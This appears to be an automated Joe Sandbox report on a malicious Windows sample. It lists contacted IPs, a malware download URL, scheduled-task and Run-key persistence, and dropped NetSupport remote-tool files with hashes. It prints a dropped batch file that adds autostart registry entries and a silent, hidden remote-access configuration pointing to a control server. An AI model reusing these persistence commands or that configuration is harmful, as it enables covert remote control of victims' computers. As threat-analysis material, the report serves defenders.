                                                                                                                                                                                                                                https://deafeninggeh.biz/apiz18ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2826664666.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2940333141.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2712485974.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2941333004.0000000001302000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmD1UL0FG.exe, 00000006.00000003.2483191115.000001FA2E348000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    https://www.iqiyi.com/D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECB8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.D1UL0FG.exe, 00000006.00000003.2581019615.000001FA2E2A8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2552764797.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2993719449.000001FA2E2AF000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2490431085.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpfalse

                                                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                        185.215.113.43
                                                                                                                                                                                                                                        		unknownPortugal
                                                                                                                                                                                                                                        		206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                        104.21.66.86
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        172.217.19.227
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		15169GOOGLEUSfalse
                                                                                                                                                                                                                                        185.215.113.64
                                                                                                                                                                                                                                        		unknownPortugal
                                                                                                                                                                                                                                        		206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                                                                        172.67.180.113
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        172.67.68.212
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        104.21.23.76
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                        185.215.113.16
                                                                                                                                                                                                                                        		unknownPortugal
                                                                                                                                                                                                                                        		206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                                                                        208.95.112.1
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		53334TUT-ASUSfalse
                                                                                                                                                                                                                                        149.154.167.220
                                                                                                                                                                                                                                        		unknownUnited Kingdom
                                                                                                                                                                                                                                        		62041TELEGRAMRUfalse
                                                                                                                                                                                                                                        23.55.153.106
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                        104.131.68.180
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                        178.62.201.34
                                                                                                                                                                                                                                        		unknownEuropean Union
                                                                                                                                                                                                                                        		14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                        31.41.244.11
                                                                                                                                                                                                                                        		unknownRussian Federation
                                                                                                                                                                                                                                        		61974AEROEXPRESS-ASRUfalse

                                                                                                                                                                                                                                        General Information

                                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                        Analysis ID:1578555
                                                                                                                                                                                                                                        Start date and time:2024-12-19 22:09:06 +01:00
                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                        Overall analysis duration:0h 20m 53s
                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                        Number of analysed new started processes analysed:112
                                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                                        Sample name:file.exe
                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                        Classification:mal100.rans.troj.adwa.spyw.expl.evad.winEXE@187/113@0/14
                                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                                        HCA Information:Failed
                                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                                        • Skipping network analysis since amount of network traffic is too extensive
                                                                                                                                                                                                                                        • VT rate limit hit for: file.exe

                                                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                                        16:10:21API Interceptor15333443x Sleep call for process: skotes.exe modified
                                                                                                                                                                                                                                        16:10:44API Interceptor166x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                        16:10:46API Interceptor2x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                                                        16:10:57API Interceptor13x Sleep call for process: 8ZVMneG.exe modified
                                                                                                                                                                                                                                        16:11:11API Interceptor8x Sleep call for process: d0ef52de9f.exe modified
                                                                                                                                                                                                                                        16:11:16API Interceptor16x Sleep call for process: d188864e84.exe modified
                                                                                                                                                                                                                                        16:11:31API Interceptor13568451x Sleep call for process: FuturreApp.exe modified
                                                                                                                                                                                                                                        22:10:14Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        22:12:05Task SchedulerRun new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                        22:12:43AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run f8645e1e85.exe C:\Users\user\AppData\Local\Temp\1017909001\f8645e1e85.exe
                                                                                                                                                                                                                                        22:12:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run fde98a8d0b.exe C:\Users\user\AppData\Local\Temp\1017910001\fde98a8d0b.exe
                                                                                                                                                                                                                                        22:13:01AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 67fbb282d1.exe C:\Users\user\AppData\Local\Temp\1017911001\67fbb282d1.exe
                                                                                                                                                                                                                                        22:13:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run f7b3852b06.exe C:\Users\user\AppData\Local\Temp\1017912001\f7b3852b06.exe
                                                                                                                                                                                                                                        22:13:19AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run f8645e1e85.exe C:\Users\user\AppData\Local\Temp\1017909001\f8645e1e85.exe
                                                                                                                                                                                                                                        22:13:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run fde98a8d0b.exe C:\Users\user\AppData\Local\Temp\1017910001\fde98a8d0b.exe
                                                                                                                                                                                                                                        22:13:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 67fbb282d1.exe C:\Users\user\AppData\Local\Temp\1017911001\67fbb282d1.exe
                                                                                                                                                                                                                                        22:13:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run f7b3852b06.exe C:\Users\user\AppData\Local\Temp\1017912001\f7b3852b06.exe
                                                                                                                                                                                                                                        22:13:55AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ApproximateSize.vbs
                                                                                                                                                                                                                                        22:16:59Task SchedulerRun new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe

                                                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                                                        IPs

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                                        C:\Users\Public\Netstat\FuturreApp.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):105848
                                                                                                                                                                                                                                        Entropy (8bit):4.68250265552195
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:qTjV5+6j6Qa86Fkv2Wr120hZIqeTSGRp2TkFimMP:qHVZl6FhWr80/heT8TkFiH
                                                                                                                                                                                                                                        MD5:8D9709FF7D9C83BD376E01912C734F0A
                                                                                                                                                                                                                                        SHA1:E3C92713CE1D7EAA5E2B1FABEB06CDC0BB499294
                                                                                                                                                                                                                                        SHA-256:49A568F8AC11173E3A0D76CFF6BC1D4B9BDF2C35C6D8570177422F142DCFDBE3
                                                                                                                                                                                                                                        SHA-512:042AD89ED2E15671F5DF67766D11E1FA7ADA8241D4513E7C8F0D77B983505D63EBFB39FEFA590A2712B77D7024C04445390A8BF4999648F83DBAB6B0F04EB2EE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\FuturreApp.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L...T..U.....................n...... ........ ....@..................................K....@.................................< ..<....0...i...........t..x).......... ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....i...0...j..................@..@.reloc..l............r..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\Public\Netstat\HTCTL32.DLL

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):328056
                                                                                                                                                                                                                                        Entropy (8bit):6.754723001562745
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                                                                                                                                                                        MD5:2D3B207C8A48148296156E5725426C7F
                                                                                                                                                                                                                                        SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                                                                                                                                                                        SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                                                                                                                                                                        SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\HTCTL32.DLL, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\Public\Netstat\NSM.LIC

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):257
                                                                                                                                                                                                                                        Entropy (8bit):5.119720931145611
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:O/oPn4xRPjwx1lDKHMoEEjLgpW2MezvLdNWYpPM/ioVLa8l6i7s:XeR7wx6JjjqW2MePBPM/ioU8l6J
                                                                                                                                                                                                                                        MD5:7067AF414215EE4C50BFCD3EA43C84F0
                                                                                                                                                                                                                                        SHA1:C331D410672477844A4CA87F43A14E643C863AF9
                                                                                                                                                                                                                                        SHA-256:2050CC232710A2EA6A207BC78D1EAC66A4042F2EE701CDFEEE5DE3DDCDC31D12
                                                                                                                                                                                                                                        SHA-512:17B888087192BCEA9F56128D0950423B1807E294D1C4F953D1BF0F5BD08E5F8E35AFEEE584EBF9233BFC44E0723DB3661911415798159AC118C8A42AAF0B902F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1200..0x3bcb348e....; NetSupport License File...; Generated on 11:54 - 21/03/2018........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=EVALUSION..maxslaves=5000..os2=1..product=10..serial_no=NSM165348..shrink_wrap=0..transport=0..

                                                                                                                                                                                                                                        C:\Users\Public\Netstat\PCICHEK.DLL

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18808
                                                                                                                                                                                                                                        Entropy (8bit):6.22028391196942
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
                                                                                                                                                                                                                                        MD5:A0B9388C5F18E27266A31F8C5765B263
                                                                                                                                                                                                                                        SHA1:906F7E94F841D464D4DA144F7C858FA2160E36DB
                                                                                                                                                                                                                                        SHA-256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
                                                                                                                                                                                                                                        SHA-512:6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\PCICHEK.DLL, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\Public\Netstat\PCICL32.DLL

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3735416
                                                                                                                                                                                                                                        Entropy (8bit):6.525042992590476
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:cTXNZ+0ci2aYNT8wstdAukudJ1xTvIZamclSp+73mPu:cTXNo0cpKwstTJIkS43mm
                                                                                                                                                                                                                                        MD5:00587238D16012152C2E951A087F2CC9
                                                                                                                                                                                                                                        SHA1:C4E27A43075CE993FF6BB033360AF386B2FC58FF
                                                                                                                                                                                                                                        SHA-256:63AA18C32AF7144156E7EE2D5BA0FA4F5872A7DEB56894F6F96505CBC9AFE6F8
                                                                                                                                                                                                                                        SHA-512:637950A1F78D3F3D02C30A49A16E91CF3DFCCC59104041876789BD7FDF9224D187209547766B91404C67319E13D1606DA7CEC397315495962CBF3E2CCD5F1226
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\Public\Netstat\PCICL32.DLL, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\PCICL32.DLL, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(.t.I.'.I.'.I.'A..'.I.'...'.I.'.?#'.I.'...'.I.'.1.'.I.'.I.'.J.'.1.'.I.'.1.'.I.'..#',I.'.."'.I.'...'.I.'...'.I.'...'.I.'Rich.I.'................PE..L......V...........!......... ..............0................................9.....f-9.....................................4........`................8.x)...P7.p....@.......................P.......P..@............0..........`....................text............................... ..`.rdata.......0......................@..@.data....%..........................@....tls.........@......................@....hhshare.....P......................@....rsrc........`......................@..@.reloc..(2...P7..4....6.............@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\Public\Netstat\TCCTL32.DLL

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):396664
                                                                                                                                                                                                                                        Entropy (8bit):6.809064783360712
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
                                                                                                                                                                                                                                        MD5:EAB603D12705752E3D268D86DFF74ED4
                                                                                                                                                                                                                                        SHA1:01873977C871D3346D795CF7E3888685DE9F0B16
                                                                                                                                                                                                                                        SHA-256:6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
                                                                                                                                                                                                                                        SHA-512:77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\TCCTL32.DLL, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...Y?XV...........!................................................................'.....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc.. F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\Public\Netstat\UpdateFuturreApp.bat

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
                                                                                                                                                                                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):300
                                                                                                                                                                                                                                        Entropy (8bit):5.131775788834825
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:hwszH1j0KpIAgidquHGjCscfoZH1j0KpIAgidquHGjCsW/jCE:HVj0KprgidqugI+Vj0KprgidqugUrX
                                                                                                                                                                                                                                        MD5:6C49E627C4228F1D9776C78749D2DDCB
                                                                                                                                                                                                                                        SHA1:0241B8E0073116C0F738BB0721C68F6B951AE7C6
                                                                                                                                                                                                                                        SHA-256:D32A160B8DC638589A30EFFB82DC33AFDA3F8CD2A1E7789FE147439C2872BAA9
                                                                                                                                                                                                                                        SHA-512:DBCFD98FFF31C4D555A8D61EB95660A04E9BE79079DD741C11874005DE443694A8425A5434056F1E5722911628359B0A812E9D6C6D030F32477973FCA870880D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:@echo off..REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\FuturreApp.exe"..REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\FuturreApp.exe"..start %Public%\Netstat\FuturreApp.exe..

                                                                                                                                                                                                                                        C:\Users\Public\Netstat\client32.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):702
                                                                                                                                                                                                                                        Entropy (8bit):5.536854980364518
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:YTNWqzd+mPZGS/py6z8BlsVTXuZ7+DP981E7GXXfDWQClnmSuh6IAlkz6:yWqzEmPZly6YBlLoG1fXXfDiU6IAaz6
                                                                                                                                                                                                                                        MD5:A4AA9219BECDEEC09159270BB041BB35
                                                                                                                                                                                                                                        SHA1:2D08305017EFB0A1FF7DEFDF66DB80191ED9CCF8
                                                                                                                                                                                                                                        SHA-256:277B9BCB5778CD5DC167ED75528818B06ED12F3FD427339F3085F4DB8A39ED2E
                                                                                                                                                                                                                                        SHA-512:4F7CE001DA009FCBA0C5BEAB572A16306D56FD91253C45D5196892142DA78EC805982A4E1C136AD61471B5A951697EED76F9EE63D8B94EB64024A11E0FD0DE42
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:0x58095535....[Client].._present=1..DisableChatMenu=1..DisableClientConnect=1..DisableDisconnect=1..DisableLocalInventory=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAOeJWid73S6SvOyjjiTDVewA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0......[HTTP]..GatewayAddress=185.215.113.64:443..gsk=EFHH;K>OBDEJ9A<I@BCB..gskmode=0..gsku=EFHH;K>OBDEJ9A<I@BCB..GSKX=EFHH;K>OBDEJ9A<I@BCB....

                                                                                                                                                                                                                                        C:\Users\Public\Netstat\msvcr100.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):773968
                                                                                                                                                                                                                                        Entropy (8bit):6.901559811406837
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                                                                                                                                                        MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                                                                                                                                                        SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                                                                                                                                                        SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                                                                                                                                                        SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
